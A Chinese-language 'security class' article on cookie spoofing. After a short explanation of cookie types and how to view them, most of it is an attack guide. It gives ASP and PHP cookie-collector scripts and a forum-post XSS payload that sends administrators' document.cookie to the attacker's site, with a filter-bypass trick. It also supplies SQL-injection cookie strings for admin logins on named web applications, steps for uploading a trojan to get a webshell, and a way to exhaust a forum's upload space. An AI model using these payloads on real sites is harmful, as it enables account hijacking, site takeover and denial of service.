安全课堂：Cookie欺骗攻击方法大揭密

Cookie是什么

    众所周知，浏览网页时网页程序会在你的硬盘上创建一个Cookie文本文件，在XP的C:\Documents and Settings\XP登录用户名\Cookie目录下，你可以看到这些Cookie文件，格式为：XP用户名@网站地址[数字].txt。

    一、Cookie是什么？

    为了方便用户浏览、准确收集访问者信息，很多网站都采用了Cookie技术。Cookie文件中存放了一些MD5加密信息，比如用户ID、密码、停留时间等，如果网站在你的硬盘上创建了Cookie，以后再次访问该站时，网站就会读取该Cookie然后做出相应的动作，例如不输入用户ID、密码直接登录，进行身份和权限验证等。

    Cookie分成持久Cookie和会话Cookie（session Cookie）两种类型。前者保存在你的电脑硬盘中（通常是加密的），例如你首次访问某站时，服务器会在数据库中新建一个唯一的ID，并把该ID记录在持久Cookie中传送给你；以后再次来访时，服务器会读取该Cookie，判断你是否为老用户，或者计算访问次数等操作。持久Cookie可能会遭到Cookie欺骗及针对Cookie的跨站脚本攻击，不如session Cookie安全。

    会话Cookie位于服务器端、保存在内存（浏览器进程）中，当你浏览某网页时创建，关闭此页即删除。例如这样一个会话Cookie：首次登录网站时，服务器会验证你的授权证书创建一个会话Cookie，在不关闭浏览器的情况下、如果你再次访问该站，服务器就会读取该会话Cookie验证你是谁，验证通过后，服务器将返回你请求的页面，否则你就得重新登录，一旦登出该站，会话Cookie即被删除，你的会员权限也将随之终止。

查看Cookie方法

    要查看Cookie，你可以启动IE，点击菜单“工具”→“Internet选项”，在“常规”选项卡中点“设置”→“查看文件”，即可看到你硬盘中所有的Cookie文件，这些TXT文件通常以<XP用户名>@domain格式命名，domain是你访问过的网站域名。

    此外，你也可以使用IECookieView来查看、修改删除或保存Cookie文件。启动IECookieView，软件上半部窗口会列出你登录过的网站信息，其中Hits列记录了Cookie被网站读取的次数；选中某个网站（例如35me.cn），在下面窗口中就会列出该站生成的Cookie内容，有KEY、Value、Domain、Created In等列，其中Created In列的值如果为Client，表示该Cookie是网页中的JavaScript or VBScript代码生成的，如为Server，则是网页中的JAVA、asp.net、asp、php、jsp代码创建的（即服务器端运行的程序生成的）；Value列中一般存放用户名、用户ID、访问次数、访问来路网址等信息，通过查看Value列，你可以发现一些个人隐私，例如网站的登录用户名、密码等。为此，建议你在公共场所上网后，要运行IECookieView，点击菜单“Destroy All Except The Selected Cookies”删除全部Cookie文件，以免帐号、密码等隐私信息外泄。

    三、Cookie欺骗攻击案例

    Cookie欺骗是常见的攻击网站方式，所谓Cookie欺骗，就是将别人的Cookie向服务器提交，冒充别人的身份登录网站。要用Cookie欺骗攻击某站，首先需要获得该站管理员的Cookie，方法如下：

    1、获得管理员Cookie

    （1）收集Cookie程序

　　用FrontPage2003写一个收集别人Cookie的程序Cookies.asp，代码如下：

　　<%
　　　　testfile=Server.MapPath("cookmm.txt")
　　　　msg=Request("msg")
　　　　set fs=server.CreateObject("scripting.filesystemobject")
　　　　set thisfile=fs.OpenTextFile(testfile,8,True,0)
　　　　thisfile.WriteLine(""&msg& "")
　　　　thisfile.close
　　　　set fs = nothing
　　%> 

　　将它上传到你的网站空间中(网站空间要支持ASP运行)，以后访问者只要执行了该程序，他的Cookie就会被收集到cookmm.txt文件中；为了能同时显示被攻击站首页，在Cookies.asp中还应增加以下代码：

　　<script language=vbscript> 
　　window.location.href="http://<被攻击站的域名>" 
　　</script>

    以上是ASP代码，具有同样功能的Cookies.php程序，代码如下：

　　<?php 
　　$info = getenv("QUERY_STRING"); 
　　if ($info) { 
　　$fp = fopen("Cookies.txt","a"); 
　　fwrite($fp,$info."n"); 
　　fclose($fp); 
　　} 
    header("Location: http://<被攻击站的域名>");
　　?>

    （2）在论坛中发帖

　　在论坛中发帖，诱使别人点击帖内URL，只要访问者点击了该URL，他登录论坛时产生的Cookie就会保存在cookmm.txt文件中，URL代码如下：

　　javascript:window.open(‘http://<你的网站域名>/Cookies.asp?msg=’+document.Cookie)

　　msg后边的document.Cookie表示访问此帖用户的Cookie，如果论坛过滤javascript字符，则在帖子中将javascript写成ASCII码（比如j写成“&#x6a;”）

　　例如黑鹰论坛有头像漏洞，如果要攻击可以在论坛中发帖，在论坛的头像地址中输入如下代码： javascript:windows.open('http://<你的网站域名>/ Cookies.asp?msg='+documents.Cookie)写好了后提交，然后在论坛上发帖子，只要管理员浏览你的帖子，即可拿到他的Cookie，他登录论坛时产生的Cookie会保存在cookmm.txt文件中！

利用Cookie欺骗攻击网站

    偷到网站管理员Cookie后，就能利用Cookie欺骗攻击该站了，方法是：打开要攻击站后台管理页面，用“老兵Cookie欺骗工具”向该站服务器提交管理员Cookie，这样即可冒充管理员绕过密码验证登入后台，然后再通过后台的上传功能上传木马拿下Webshell，下面我们以入侵“讯时管理系统”网站为例，介绍操作步骤。

　　用“讯时管理系统”代码建的网站有Cookie欺骗漏洞，打开“桂林老兵Cookies的欺骗工具”，在address栏中输入该站管理员登录页地址，尝试使用以下两个Cookies进行注入：

admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd或者

admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'

　　点击“桂林老兵Cookies的欺骗工具”工具栏上的黄色小锁按钮，把以上2个Cookies分别复制到Cookies框中，再点击右边的“连接”按钮，看能否直接进入后台登录页面，如果能进入，说明该Cookie注入获得成功；例如我们将admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'粘贴到Cookies框中，点右边的“连接”按钮，发现成功以'or'='or'身份登入该站后台管理系统，最后你可以传马拿下该站。
　　
　　以下是Cookie欺骗攻击网站案例。

    网站程序名
管理员登录页地址
攻击时使用的Cookies
LeadBBS V3.14 美化插件版
http://127.0.0.1/bbs/manage/
gbtoyAtBD=0; path=/ASPSESSIONIDAQDRRDBD=DMMBDEPBNOGCKDGKBKEHGHAN; path=/gbtoyTime=2005%2D3%2D25+19%3A48%3A19; path=/gbtoy=pass=111222333&user=%B0%D7%CC%EC%B5%C4%C3%A8; path=/

    修改以上Cookies ，user=后面是会员ＩＤ，把总斑竹的ＩＤ换上去；冒充总斑竹登入后台后，在上传文件参数里添加.asp文件（在.asp后多加一个空格），上传木马时也要在扩展名后多打一个空格。
JIMMY中文站留言簿 v1.08
http://127.0.0.1/JIMMY/admin-index.asp
ASPSESSIONIDSQSRTSDC=DMJDAGLBOJNGBIGJPJAHIPOA; lunjilyb=randomid=12&password=jkh&username=jkh
商贸通2006地方门户版系统
http://127.0.0.1/admin/manage.asp
adminID=5;admin=admin;adminflag=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1

    2.利用Cookie欺骗实现无限上传

　　在百度或GOOGLE中搜索“动网论坛”找到一个动网论坛，打开该论坛注册一个会员名，随之你的硬盘上就会生成一个Cookie文件，以后登录论坛后只能上传5个文件，如果你想上传无限个文件，可以删除本地硬盘中的Cookie，因为会员上传文件的数量保存在Cookie中，删除之即可重新上传5个文件，操作步骤：

　　启动IE，点击菜单“工具”/Internet选项，在“常规”选项卡中点“删除Cookies”，删除本地Cookie，然后刷新论坛，此时会看到你的登录无效、需要重新登录；接下来重新登录，然后你又可以再上传5个文件了，如此循环进行删除Cookie、上传文件操作，这样即可实现无限上传，估计要不了多久论坛空间就会被你撑破的！